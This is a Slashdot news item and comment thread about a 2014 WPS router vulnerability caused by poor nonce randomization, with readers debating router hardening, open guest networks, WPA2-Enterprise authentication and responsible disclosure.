Forgot your password?
typodupeerror
Wireless Networking Security Hardware

Wi-Fi Router Attack Only Requires a Single PIN Guess 84

Posted by Soulskill
from the one-two-three-four dept.
An anonymous reader writes: New research shows that wireless routers are still quite vulnerable to attack if they don't use a good implementation of Wi-Fi Protected Setup. Bad implementations do a poor job of randomizing the key used to authenticate hardware PINs. Because of this, the new attack only requires a single guess at the hardware PIN to collect data necessary to break it. After a few hours to process the data, an attacker can access the router's WPS functionality. Two major router manufacturers are affected: Broadcom, and a manufacturer to be named once they get around to fixing it. "Because many router manufacturers use the reference software implementation as the basis for their customized router software, the problems affected the final products, Bongard said. Broadcom's reference implementation had poor randomization, while the second vendor used a special seed, or nonce, of zero, essentially eliminating any randomness."
This discussion has been archived. No new comments can be posted.

Wi-Fi Router Attack Only Requires a Single PIN Guess

Comments Filter:
  • WiFi Protected Setup shouldn't be used anyways for security, especially since its problems have already been mentioned many times already in quite a few articles.
    • by Anonymous Coward

      true, except every router makes uses it and only almost all routers don't have the option to turn it off. I blame this on business marketing department (ie whitey).

      • by afaiktoit (831835)
        and the ones you think you're turning it off it really isnt.
    • Re: (Score:1, Informative)

      by The Larch (115962)
      Thanks captain! This is real insightful! Also women should not wear dresses, and people should not buy consumer goods.
  • Wireless security (Score:5, Informative)

    by ledow (319597) on Saturday August 30, 2014 @07:08PM (#47792921) Homepage

    Is it just me that hates shit on my router?

    - WPS (a.k.a. turn your massive password into a four-digit number): turned off on every router I've ever used, since day one of installation.

    - UPnP (a.k.a. let anything open any port to anywhere without authentication): turned off on every router I've ever used, since day one of installation.

    - WPA/WEP (a.k.a. half-arsed encryption that we never really thought through): turned off on every router I've ever used, since day one of installation.

    - Guest networks (a.k.a. let random strangers use your Internet connection without you knowing): turned off on every router I've ever used, since day one of installation.

    - Remote administration (a.k.a. let random strangers on the Internet sit and brute-force your passwords with no way to tell it's happening): turned off on every router I've ever used, since day one of installation.

    And, in fact, on anything BUT my actual wireless router of choice (e.g. any Internet router supplied by my ISP):

    - wireless (a.k.a. give people another way into my network and hinder all my other - wanted - wifi connections by flooding the airwaves): turned off on every router I've ever used, since day one of installation.

    Seriously, people, just turn this shit off. And layer VPN over the top of it, if you can. Seriously. There's zero impact on always VPN'ing over your wireless connection to a machine that has a fixed line to your actual Internet connection. Then even if WPA2 is broken, you're still secure. And yes, you can game. I've done it with OpenVPN over my wireless for years - for EVERY packet - that goes over the wireless.

    Wireless is the leaky, draughty hole of your network. Seal that fucker up and treat it like an Internet connection, even to your local network.

    • Re:Wireless security (Score:5, Informative)

      by arbiter1 (1204146) on Saturday August 30, 2014 @07:52PM (#47793083)
      Sadly Some routers even if you turn it off, its not really off.
    • Re:Wireless security (Score:5, Interesting)

      by Anonymous Coward on Saturday August 30, 2014 @08:39PM (#47793253)

      Hah. You're stressing over every little thing.

      The part that really bothers me though is your turning off guest networks. I've always turned off the automatic kind (NAME OF ROUTER -GUEST NETWORK), but then gone on to set one up as a virtual access point properly on ddwrt. At home and at work I've shared my internet connection with the apartment block across the street, the corrections institute, gay bar, fitness center and mortgage company and any random stranger that passes by. Even the homeless or just plain poor people.

      You know what I have learned? People aren't the pieces of shit that people like you think that they are.

        I've never seen a pedophile, or a hacker.I've always monitored network traffic and I do keep logs. I've seen one or two people who look at porn and two fucking rokus. (you can afford netflix and you're using my connection across the street? wtf? sorry about the stutters....durrr) out of hundreds of people I have found most people are pretty endearing and normal. most people look at their facebook, or they ask google personal questions. Like where to find a job, or get a date or how to solve/fix something. or they research stuff.. That's all.

      I'm probably giving internet access to some of the people that block my parking spot now that I think about it. *laughs*.

      in short, sharing has made things better for those around me and I haven't been harmed by it at all.

      captcha: bragged

      • Re:Wireless security (Score:5, Interesting)

        by Anonymous Coward on Saturday August 30, 2014 @10:39PM (#47793659)

        Ignore the hate man, keep doing what you're doing :) I'm the same, XXXX_ST_FREE_WIFI has been up most of the last 3 years, and similar at units before this. I set up an old wireless router and RaspberryPi to provide an isolated network with an internet connection for anyone who wants to stop within range (the bus stop across the road is the main source of traffic).

        I have around 6 unique connections a day, and several regulars from the surrounding units or daily commute. I redirect "google.com*" to a local splash page (with the google search page in a frame below) that has a couple lines saying this is my personal connection, feel free to use but I'll shut down any time if I need the bandwidth, or think people are being suss. I highlight that it is essentially a public network, so advise against anything personal / private, so I think people assume they're being watched and stay on their best behaviour anyway :P

        I originally started with some strict firewall rules (port 80 / 443 outbound only), but found people just never tried anything else really. I think I've seen a couple dozen POP / IMAP requests which were probably from auto sync, and a couple bittorrent users, but noone's ever tried to even probe at the guest network, let alone look for my (isolated) home network.

        I also have a file share that I let people dump to / from which I clear daily, and one that serves a bunch of free software and my local distro mirror. I've _never_ had anyone put anything I disapproved of on there. I've had a couple people dump a movie or music on there, but I've removed and replaced with a note saying that's not what its for (in case they check back). Some others have started chats back and forth with simple text files, most people just posted pics with a thumbs up to say thank you :) (my suggestion in the landing page)

        All in all, its been a great experience. I liken it to running a small social media site that's location based, rather than internet facing. I'm thinking of adding a persistent page with a guest book / wall, just to reach out a little more personally.

        Like you said, people aren't the pieces of shit people think. Those that are generally have shittier things to do than mess with a random wifi network.

        captcha: intercom

        • by Anonymous Coward

          It probably depends on the location. I wouldn't recommend doing that in the vicinity of a railway station or some other place with a lot of out-of-area people passing through (places that would also attract "real world" crime.) Anyways, kudos for sticking your head out.

      • you can afford netflix and you're using my connection across the street? wtf?

        Being able to afford Netflix ($120 per year) doesn't always imply being able to afford the inflated prices that cable providers charge for high-speed Internet access without a subscription to multichannel pay TV at the same address (often $700 or more per year).

      • But you don't get it, you're supposed to be afraid so that you feel better about buying whatever product the fear-mongers are selling. I have open Wi-Fi too. For fun I monitored it to see who was connecting and what type of traffic I'd get, but after a month or so I gave up because no-one connected to it. Even years later I've never gone over my quota so what do I care if someone gets some free internet?
    • Many devices don't support VPNs (Chromecast for example), and the ones that do don't usually have openvpn as a built in option. Not to mention the increase in battery usage on mobile devices due to keepalives. This mostly restricts your wireless devices to laptops and select tablets or smartphones. If you really don't trust WPA then just make some LAN resources accessible by VPN only (over WPA), but allow internet access without it. Any sites with sensitive data should be using TLS anyway.

      Also, WPA2-Enterpr

      • by LiENUS (207736)

        not TTLS where you use a username/password combo (too easy for a MITM)

        TTLS properly configured is no easier to MITM than properly configured TLS, you should be using server cert validation with either.

        • The idea is defense in depth. If server cert validation fails for any reason and you're using passwords, the enemy learns all your secrets. With client certs your master secret remains safe even if a single session is compromised.
          • by LiENUS (207736)

            If server cert validation has failed chances are your CA was compromised, in which case the attacker could just generate client certs at will anyway....

            • by LiENUS (207736)

              Actually for that matter wouldnt a compromised server certificate leave you vulnerable to a proxy attack anyway where you would use the compromised server cert to pretend to be the access point communicating with the proper radius server thus giving MITM on TLS or TTLS the same? You might not get the actual client cert on TLS but you would have their traffic all the same.

              • by David Jao (2759)
                Having all their traffic to and from one server is not as devastating an attack as having their password. For one thing, users tend to re-use passwords across multiple sites. I'm sure you can think of plenty of other reasons why client certs are at least *slightly* safer than username/passwords.
                • by LiENUS (207736)

                  Aha, so you missed the original quote, i'll try bolding the relevant parts this time.

                  Also, WPA2-Enterprise is pretty secure if you only use TLS auth, not TTLS where you use a username/password combo (too easy for a MITM)

                  I was specifically replying to that part, as TLS and TTLS both have the same degree of mitm vulnerability with properly configured clients.
                  If the server cert fails in TLS or TTLS then MITM is a possibility, you dont need the username/password or client cert to mitm a TLS connection, just the server cert.

                  • by David Jao (2759)
                    If you're using client certificates for authentication, and an attacker obtains the server cert, then the attacker can successfully fool you into thinking that you have connected to the real server, but the attacker cannot successfully fool the real server into thinking that you have connected to it. This kind of "half-MITM" attack is not usually thought of as a full MITM. The authentication protocol uses a challenge/response protocol which incorporates ephemeral keys and hence is not portable even between
        • I've actually found that a lot of devices just ignore an invalid (ie not from a trusted CA) certificate for this. Android in particular will happily continue with no prompt to the user that the cert is not trusted. I even had it somehow forget the CA that I specified with the network credentials. I'm not 100% certain on this, but I vaguely remember having an issue with Network Manager also not validating the server certificate with TTLS.

          It's just too risky where a device could decide either for "convenience

    • by Anonymous Coward

      > - UPnP (a.k.a. let anything open any port to anywhere without authentication)

      miniupnpd (the UPnP daemon of choice for every router software I've been able to look at) has a configuration setting that only permits a machine to forwards ports to itself. This configuration setting defaults to "on". This means that a LAN with a running miniupnpd is no less secure than a LAN with a globally-routable IPv6 address allocation.

      Additionally, on any non-shit router software (why would you advocate securing your L

    • by thegarbz (1787294)

      Errr right. Your security theory boils down to wireless has no physical barriers so we need to avoid it at all costs regardless of it's benefits?

      No thanks. While I agree with some of your sentiment like WPS being a colossal piece of shit and remote admin just being a bad idea:

      - UPnP - I am not going to manually configure every internet facing service every time I want to use a piece of software.
      - WPA - While WEP is proven weak and breakable, WPA hasn't been broken without some serious conditions (knowing wh

      • UPnP - I am not going to manually configure every internet facing service every time I want to use a piece of software.

        In the era of IPv4 address exhaustion and IPv6 foot-dragging, more and more users end up behind carrier-grade NAT. To serve these users, more and more applications are being written to bounce traffic off a server so that the client can get away with making only outbound connections.

        • by thegarbz (1787294)

          That's great from an end user perspective, but then you're advocating applications tied to a specific internet service? I'm surprised you haven't been nodded into oblivion by the trust no corporation crowd on slashdot.

          But they definitely have a point. Connectivity between two clients should not depend on a third party server, especially since many of us not only have real IPs but static ones too.

          • by tepples (727027)
            I guess the reasoning is that people behind a static IP probably don't need UPnP. If you pay extra for a static IP, you're probably doing so because you have more computer networking knowledge than the average user of the WWW, and you can just use your Internet gateway's configuration panel to forward incoming port ranges to particular machines.
            • by thegarbz (1787294)

              The presence of a static IP address (which I get by signing up to the cheapest ISP in the country, not by paying extra) has nothing to do with not wanting to dedicate effort to manage a home network. It is not at all hard to open ports. You don't need to be some technical whiz, and while I am that whiz I have no interest in managing applications in my home network when a perfectly good system allows me to do it.

              As far as I am concerned my network is designed to be leaky. Internal applications should have co

    • by mlts (1038732)

      The ironic thing is that WPA2-PSK is decently secure. I've not read of any significant breaks, assuming the key is of a decent length.

      The problem is that there are shortcuts given (WPS) which make having a solid shared key pointless.

      UPnP? Just asking for trouble. If a game has to have ports open, I'll manually open them myself. Otherwise, they should remain closed.

      WEP? This shouldn't even be present in any router made in recent years. My HTC Wizard, circa 2006, had an application (before the word "app

      • by tepples (727027)

        If I want [remote administration] functionality, I'll have some sort of port knocking, a DMZ machine, and SSH with 2FA or via RSA keys to an inside machine to access the router.

        That's a lot of electric power to waste on leaving two computers on 24/7 just so that you can troubleshoot problems with a router belonging to a not-so-technically-inclined relative who lives far from you.

      • by mjwalshe (1680392)
        if I want remote admin ill use a proper cisco router with an out of band modem with call back thank you very much
    • by tlhIngan (30335)

      Well, it's to make life simpler for users.

      WPS - the alternative to this for "regular users" is no security. Great for those who need a hotspot in a hurry, not so great in general. Instead, all users need to is hit a button and enter a code.and they have encrypted WiFi working. It's just like TouchID on the iPhone - Apple realized people should use passcodes for security, but many don't because it's )@*#&%*(@ annoying to enter it (especially if you have "complex passcodes" on) 1,000 times a day.

      WPA is st

    • You are trusting your ISP to deliver you a router that has all these things properly configurable and not leave back doors for their own remote admin and whatnot still open. ISPs don't do that, they always leave themselves a backdoor and often are lax in upgrading firmware. If at all possible, let your ISPs router do only the minimal required to let your network connect to the internet and do the rest (firewalling, NAT, WiFi) on your own trusted devices.
      • by ruir (2709173)
        Trust what? I disabled all the routing and wifi functions of my cable modem, only use the bridging mode and placed there my own.
    • I take it a step further, I buy appliances with exactly the feature set that I need. I admit it gets harder and harder. The usual dialogue in the store:

      "I want to buy a $device without $feature"
      "Sir, we'd have $device here, you can disable $feature in it"
      "Where? I don't see the switch to turn it off."
      "You can disable it in the configuration"
      "So... I can turn it off in the config and anyone who can get into the configuration page of the device can turn it back on?"
      "Umm... yeah, but you'd be the only one who

      • by Anonymous Coward on Sunday August 31, 2014 @03:37AM (#47794309)

        Let me get this straight: you refuse to buy a wireless router with WPS that can be disabled in the administration console for the router because if someone pwns your router administration console they might be able to turn WPS back on?

        Really? I bet you also refuse to use ATM cards because if someone stole your identity, got issued a fake driver's license, stole all your passwords, etc, they might be able to contact the bank and change your PIN!

    • WPA/WEP (a.k.a. half-arsed encryption that we never really thought through): turned off on every router I've ever used, since day one of installation.

      Was this true even during the days of Nintendo Wi-Fi Connection, when the Nintendo DS couldn't use anything but WEP? Or did you just skip the DS?

      Remote administration (a.k.a. let random strangers on the Internet sit and brute-force your passwords with no way to tell it's happening): turned off on every router I've ever used, since day one of installation.

      So when you're setting up a home network for a relative who lives far away and is not technically inclined, and you have to troubleshoot it, do you make plans to get on an airplane whenever something goes wrong?

      Seriously. There's zero impact on always VPN'ing over your wireless connection to a machine that has a fixed line to your actual Internet connection.

      Except on machines that do not support OpenVPN, such as a video game console.

    • by Anonymous Coward

      - networking (a.k.a. allow another computer to snoop into my hardware and software): turned off on every computer I ever used, since day one of installation.

    • by antdude (79039)

      Or better, don't use wireless at all!

  • by Anonymous Coward

    rubbish.
    we want cheap devices ..like printers. if we can talk to them via tcp/ip or even wifi this is agood thing(tm).
    in my case the printer was tcp/ip AND wifi but no display/menu to speak of.
    the one with a display would have printed the same quality but would have cost more.
    so how the swiss cheese was i to setup the printer via wifi if i could not access it to setup the passphrase and ip address etc.etc?
    wifi protected setup to the rescue.
    once it was paired to the router automagically i could access the pr

  • by Anonymous Coward

    well, you can always use Huawei routers, they are too cheap to follow standards (a.k.a. be vulnerable to wps)

  • ...a manufacturer to be named once they get around to fixing it...

    Someone got paid off not to name the manufacture. Doing a great injustice to their customers by not letting them know their routers can easily be compromised.

    Sure, maybe not letting the criminals know which manufacture might seem like a smart idea, but in the same process, they don't need to know, they can just start checking them all. Your customers aren't safe that way. At least if you tell them there is a problem, they can use secondary measures, like turning off their router when they aren't using it. Maybe change their password every hour or so, or maybe pay attention to anything connecting to it. At least that way you can do something about it.

    Going to boycott which ever manufacture that is because they don't have my security in mind when they do stuff like this.

    • by roady (30728)

      Nobody got paid. We call this responsible disclosure. Only thing is the Broadcom flaw was found before the second flaw and so they has a heads up.

        http://en.wikipedia.org/wiki/R... [wikipedia.org]

      • It can also protect profits to make sure that the announcement of the vulnerability smears all vendors and thus includes your competitors tools, not merely your own company's flawed products. This is called "sponsoring more research before publication". I'm afraid that it's a noticeable source of funding for security researchers, and can also buy valuable time to sell off as much of the flawed inventory as possible while or until the fix is provided for newer products.

        I'm afraid that there are people who th

        • by roady (30728)

          So to be crystal clear, are you accusing me of being a liar and having accepted money from a vendor?

          • >> We call this responsible disclosure.

            > are you accusing me of being a liar

            I'd not done so. I don't discount responsible disclosure as existing: I'd certainly want to see a zero-day exploit reported to the authors, first, so that they can get a chance to publish a patch before the flaw spreads in the wild, and I _report_ flaws directly to vendors and authors when I encounter them.

            I've explained other, more selfish reasons that a vendor or a security researcher might decline to publish full detail

            • by roady (30728)

              I am the guy who did the research in this article actually.

              • Good for you, then, that you are doing real work in the field. I'll applaud your technical work in discovering and publishing this vulnerability, and I hope you'll feel able to publish more details ASAP{.

                As you are actually doing security work I'll urge that you be aware of why and how people might use your practice of genuinely responsible disclosure against their own customers or clients. There often comes a time when you have to make choices about whistle-blowing: exposing the flaws more widely to force

  • I know for example that Apple uses broadcom chipsets and supports WPS (through Airport Utility) - are they vulnerable?

    A known list of vulnerable routers would be very interesting.

    • by roady (30728)

      Yes, of course, but it's unfortunately very complicated.

      1. Showing a router is vulnerable is easy. Proving one is not is hard.

      2. Buying and reversing each and every router is mighty expensive.

Never test for an error condition you don't know how to handle. -- Steinbach

Working...